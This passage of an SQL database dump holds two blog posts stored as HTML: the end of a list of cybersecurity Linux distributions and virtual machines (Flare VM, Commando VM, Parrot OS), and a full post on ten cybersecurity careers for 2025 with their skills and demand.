<b><strong class=\"font-bold\">Flare VM</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://github.com/fireeye/flare-vm\">https://github.com/fireeye/flare-vm</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Designed for use on Windows, Flare VM offers an extensive suite of tools for reverse engineering and malware analysis, making it perfect for deep investigations on enterprise networks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Tools for threat analysis and reverse engineering.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Windows-centric for specialized use cases.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">12. 
<b><strong class=\"font-bold\">Commando VM</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://github.com/fireeye/commando-vm\">https://github.com/fireeye/commando-vm</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This virtual machine serves as an offensive security toolkit for advanced penetration testers and red teams. Developed by Mandiant, it emphasizes post-exploitation capabilities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Advanced red-teaming tools.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Comprehensive for offensive security workflows.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">13. <b><strong class=\"font-bold\">Parrot OS</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Website</strong></b>: <a class=\"text-indigo-700 underline underline-offset-4\" href=\"https://www.parrotsec.org/\">https://www.parrotsec.org/</a></p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Parrot OS is a lightweight, privacy-focused alternative to Kali Linux. 
With tools for penetration testing and secure corporate use, it offers excellent versatility for professionals working in varied roles.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Features:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Balanced features for hacking and privacy.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Lightweight yet resourceful alternative.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Final Thoughts</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Every Linux distribution or virtual machine listed above serves a unique purpose in cybersecurity. Whether it’s penetration testing, incident response, malware analysis, or anonymity, there is a tailored solution for your specific needs.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Explore these platforms to enhance your cybersecurity capabilities, boost productivity, and stay ahead in this dynamic field.</p>', '', NULL, NULL, 1, 'draft', '2025-01-23 20:01:38', '2026-01-12 21:41:44', 'Information Security', 'Top Linux Distributions and Virtual Machines for Cybersecurity Professionals', '', NULL);
INSERT INTO `blog_posts` (`id`, `title`, `slug`, `content`, `excerpt`, `featured_image`, `featured_image_alt`, `author_id`, `status`, `created_at`, `updated_at`, `category`, `seo_title`, `seo_description`, `focus_keyword`) VALUES
(59, '10 Best Careers in Cybersecurity for 2025', '10-best-careers-in-cybersecurity-for-2025', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity has become a crucial field in today’s internet-driven world, and its importance will only grow as we approach 2025. Fast-paced advancements in technology bring with them emerging threats, pushing businesses and governments to invest heavily in defending their digital assets. This wave of demand has created a wealth of career opportunities for cybersecurity professionals—and with high salaries, job security, and the chance to make a real-world impact, it’s never been a better time to pursue a career in this field.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Here are the <b><strong class=\"font-bold\">10 best careers in cybersecurity for 2025</strong></b>, based on current trends, evolving roles, and future needs.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Cybersecurity Analyst</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A cybersecurity analyst is responsible for managing a company’s security measures and defending against potential breaches. They use various <b><strong class=\"font-bold\">cybersecurity techniques</strong></b> to detect, analyze, and mitigate risks. 
This role often involves reviewing incident logs, analyzing potential threats, and implementing proactive security measures.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Skills:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Familiarity with intrusion detection systems</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Practical knowledge of the <b><strong class=\"font-bold\">OWASP Top 10 </strong></b> guidelines</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Expertise in <b><strong class=\"font-bold\">incident analysis</strong></b> and response</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why it’s in demand:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With the rise in sophisticated <b><strong class=\"font-bold\">cybersecurity incidents</strong></b>, businesses need analysts who can protect sensitive data and mitigate risks.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. 
<b><strong class=\"font-bold\">Penetration Tester (Ethical Hacker)</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Penetration testers, also known as white-hat hackers, simulate cyberattacks to identify vulnerabilities in a system before malicious agents find them. They ensure systems and networks are airtight by regularly stress-testing security.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Skills:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Vulnerability analysis</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Strong understanding of <b><strong class=\"font-bold\">OWASP Top 10 vulnerabilities</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Expertise in <b><strong class=\"font-bold\">advanced cybersecurity techniques</strong></b></li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why it’s in demand:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With proactive defense strategies becoming more critical, penetration testing is essential for businesses aiming to stay ahead of potential threats.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. 
<b><strong class=\"font-bold\">Incident Responder</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Incident responders act as the first line of defense during a cyberattack. They work on containing threats, analyzing causes, and providing solutions to prevent similar breaches in the future.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Skills:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Incident detection and <b><strong class=\"font-bold\">response analysis</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Knowledge of <b><strong class=\"font-bold\">cybersecurity trends 2025</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Crisis management</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why it’s in demand:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The increasing number of high-profile <b><strong class=\"font-bold\">cybersecurity incidents</strong></b> means organizations must have dedicated professionals to respond effectively.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">4. 
<b><strong class=\"font-bold\">Cloud Security Engineer</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With businesses migrating to cloud-based storage solutions, protecting sensitive data in the cloud is now more critical than ever. Cloud security engineers design and implement secure systems that shield users from breaches and attacks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Skills:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Encryption standards</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Secure cloud architecture design</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Expertise in safeguarding <b><strong class=\"font-bold\">privacy online</strong></b></li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why it’s in demand:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The rise of cloud-powered enterprises places massive responsibility on cloud security engineers to ensure data remains secure and compliant.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">5. 
<b><strong class=\"font-bold\">Threat Intelligence Analyst</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Threat intelligence analysts research, identify, and monitor emerging threats to cybersecurity. They keep enterprises informed of potential future risks and advise on necessary precautions.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Skills:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Threat evaluation and risk trends</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Deep understanding of <b><strong class=\"font-bold\">cybersecurity techniques</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Reporting and intelligence-based analysis</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why it’s in demand:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Companies are increasingly taking preventive measures to avoid costly breaches. Threat intelligence analysts give businesses valuable foresight.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">6. 
<b><strong class=\"font-bold\">Chief Information Security Officer (CISO)</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A CISO acts as the captain of an organization’s cybersecurity efforts. They oversee strategies, ensure compliance, and advise leadership about investments in cybersecurity infrastructure.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Skills:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Leadership and strategy development</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Knowledge of <b><strong class=\"font-bold\">cybersecurity trends 2025</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Risk management expertise</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why it’s in demand:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With boards and investors placing cybersecurity at the forefront of business priorities, the CISO role has grown significantly in prominence.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">7. 
<b><strong class=\"font-bold\">Privacy Engineer</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Privacy engineers focus on integrating privacy controls into systems and applications. They ensure that organizations respect user privacy while complying with regulations like GDPR and CCPA.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Skills:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Expertise in data protection laws</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Designing systems that enable users to remain <b><strong class=\"font-bold\">invisible on the internet</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Familiarity with <b><strong class=\"font-bold\">internet privacy</strong></b> tools</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why it’s in demand:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Privacy continues to be a growing concern, and consumers increasingly demand secure platforms that protect their data from misuse.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">8. 
<b><strong class=\"font-bold\">Application Security Engineer</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Application security engineers design secure applications by identifying vulnerabilities, implementing best practices, and testing for flaws. They ensure all software builds are resilient to attacks.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Skills:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Knowledge of <b><strong class=\"font-bold\">OWASP Top 10 vulnerabilities</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Secure coding techniques</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Security testing methodologies</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why it’s in demand:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Businesses are constantly developing new applications, and safeguarding these through secure development processes is crucial.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">9. 
<b><strong class=\"font-bold\">Forensic Expert in Cybersecurity</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity forensic experts investigate breaches, recover stolen data, and identify perpetrators. This role intersects law enforcement with cybersecurity knowledge.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Skills:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Data recovery and analysis</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Evidence collection from digital media</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Expertise in the <b><strong class=\"font-bold\">originating process</strong></b> of a cyberattack</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why it’s in demand:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">With an increasing emphasis on investigating and prosecuting cybercrime, forensic experts play a key role in delivering justice.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">10. 
<b><strong class=\"font-bold\">Cybersecurity Consultant</strong></b></h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A cybersecurity consultant works freelance or with firms to advise multiple organizations on improving their security posture. They create tailored security programs based on industry-specific vulnerabilities.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Skills:</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Cross-industry knowledge of <b><strong class=\"font-bold\">cybersecurity techniques</strong></b></li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Risk assessment and strategic planning</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Communication and presentation skills</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why it’s in demand:</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The flexibility of hiring consultants on a project basis makes them a high-demand role for startups, SMBs, and large corporations alike.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Preparing for the Future of Cybersecurity</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" 
dir=\"ltr\">Cybersecurity is evolving rapidly, and staying ahead means constant learning. To thrive in this domain in 2025, consider steps such as:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Upskilling</strong></b> with certifications like CISSP, CEH, or CompTIA Security+.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Keeping track of <b><strong class=\"font-bold\">cybersecurity trends for 2025</strong></b> to anticipate industry demands.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Gaining hands-on experience with tools addressing <b><strong class=\"font-bold\">internet privacy</strong></b> and defense against emerging threats.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity offers some of the most exciting and impactful career paths available today. With roles demanding diverse skill sets, a variety of opportunities exist for learners, professionals, and enthusiasts alike. Whether you’re passionate about protecting against <b><strong class=\"font-bold\">cybersecurity incidents</strong></b>, ensuring <b><strong class=\"font-bold\">privacy online</strong></b>, or conducting sophisticated <b><strong class=\"font-bold\">incident analysis</strong></b>, there’s a career in cybersecurity for everyone.</p>', '', NULL, 